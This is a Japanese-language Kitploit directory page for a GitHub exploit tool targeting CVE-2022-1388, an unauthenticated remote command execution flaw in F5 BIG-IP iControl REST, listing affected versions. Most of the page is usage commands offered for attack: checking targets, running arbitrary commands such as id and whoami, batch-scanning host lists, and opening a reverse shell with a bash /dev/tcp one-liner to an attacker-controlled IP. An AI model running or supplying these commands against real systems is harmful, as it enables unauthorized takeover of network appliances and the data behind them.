Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-1388 — CVE-2022-1388 F5 BIG-IP iControl REST RCE | Kitploit
ツール/GitHubGitHub/al1ex/cve-2022-1388
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubal1ex/cve-2022-1388

CVE-2022-1388

CVE-2022-1388 F5 BIG-IP iControl REST RCE

リポジトリを見る
371234年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

脆弱性の影響

この脆弱性により、管理ポートおよび/またはセルフIPアドレスを介してBIG-IPシステムにネットワークアクセスを持つ認証なしの攻撃者が、任意のシステムコマンドの実行、ファイルの作成または削除、サービスの無効化を行う可能性があります。

脆弱性の対象製品

  • F5 BIG-IQ 11.6.1 - 11.6.5
  • F5 BIG-IP 12.1.0 - 12.1.6
  • F5 BIG-IP 13.1.0 - 13.1.4
  • F5 BIG-IP 14.1.0 - 14.1.4
  • F5 BIG-IP 15.1.0 - 15.1.5
  • F5 BIG-IP 16.1.0 - 16.1.2

脆弱性チェック

基本的な使い方

root@kitploit:~
python3 CVE_2022_1388.py

使用

脆弱性の確認

root@kitploit:~
python3 CVE_2022_1388.py -v true -u https://192.168.17.200

確認

コマンド実行:

root@kitploit:~
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

コマンド実行

root@kitploit:~
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

実行2

ツールをダウンロード

バッチスキャン

root@kitploit:~
python3 CVE_2022_1388.py -s true -f check.txt

脆弱性スキャン

リバースシェル

root@kitploit:~
python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"

リバースシェル

リバースシェル成功

参考

https://support.f5.com/csp/article/K23605346

https://mp.weixin.qq.com/s/OC52LIGB5NTITy9EjvKdaw

https://twitter.com/jas502n/status/1523611433938059265

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388

https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr